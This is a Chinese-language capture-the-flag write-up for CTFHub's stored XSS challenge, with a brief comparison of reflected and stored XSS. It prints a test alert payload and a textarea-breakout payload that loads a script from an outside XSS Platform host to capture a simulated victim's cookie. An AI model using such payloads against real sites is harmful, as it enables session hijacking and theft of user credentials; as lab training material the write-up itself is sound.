CTFHub | 存储型

0x00 前言

CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

0x01 题目描述

存储型:

(无)
网页显示内容

0x02 解题过程

检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。

同样使用 scripts 标签写入一个警告弹窗,警告内容自定义。

javascript 复制代码
<script>alert("flag")</script>

点击提交表单按钮,发现成功跳出警告弹窗,说明此题存在 XSS 漏洞。

这里还是使用 XSS Platform 平台接受传递的参数。根据提示,将第一行代码植入到怀疑出现 xss 的地方(注意'的转义)。

javascript 复制代码
</textarea>'"><script src=http://xxx.xxx.xxx.xxx/Q7yYOv?1702702862></script>

我们先访问 XSS Platform 平台查看是否有传递过来的参数,发现 Cookie 中没有数据。

存储型 XSS 漏洞同样也需要目标用户去访问这个链接才可以成功执行。直接使用题目 URL 链接发送到第二个输入框模拟目标用户访问链接。成功执行。

再次访问 XSS Platform 平台,发现此题 flag 。

0x03 反射型 & 存储型

反射型 XSS 漏洞与存储型 XSS 漏洞区别的流程图

反射型

反射型 XSS 漏洞是指攻击者将恶意脚本注入到 URL 参数中,然后将这个 URL 发送给目标用户。当目标用户访问这个受污染的 URL 时, 这个 XSS 漏洞就会被执行。

存储型

存储型 XSS 漏洞是指攻击者将恶意脚本上传到目标网站的数据库或存储位置中,目标用户访问该网站时,恶意脚本会从服务器中被读取并在目标用户的浏览器中执行。

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

相关推荐
hcja6664 小时前
WordPress wpForo Forum插件漏洞CVE-2025-11740复现
web安全·网络安全
kali-Myon5 小时前
NewStarCTF2025-Week4-Web
sql·安全·web安全·php·ctf·ssti·ssrf
Z3r4y5 小时前
【代码审计】RuoYi-3.0 三处安全问题分析
java·web安全·代码审计·ruoyi-3.0
安全不再安全6 小时前
免杀技巧 - 早鸟注入详细学习笔记
linux·windows·笔记·学习·测试工具·web安全·网络安全
mooyuan天天7 小时前
CTFHub XSS通关:XSS-过滤关键词
xss·关键字过滤·ctfhub·xss漏洞
一袋米扛几楼987 小时前
【软件安全】什么是XSS(Cross-Site Scripting,跨站脚本)?
前端·安全·xss
挨踢攻城9 小时前
项目实战 | 新建校区网络安全项目:从搭建到交付
安全·web安全·公众号:厦门微思网络·华为网络安全项目·项目实战案例·网络安全项目·新建校区网络安全项目
AI分享猿11 小时前
免费WAF天花板!雷池WAF护跨境电商:企业级CC攻击防御,Apache无缝适配
爬虫·web安全
我就是一粒沙12 小时前
网络安全培训
网络·安全·web安全
安全系统学习14 小时前
自学网络安全学习的误区和陷阱
数据库·学习·安全·web安全·网络安全·安全架构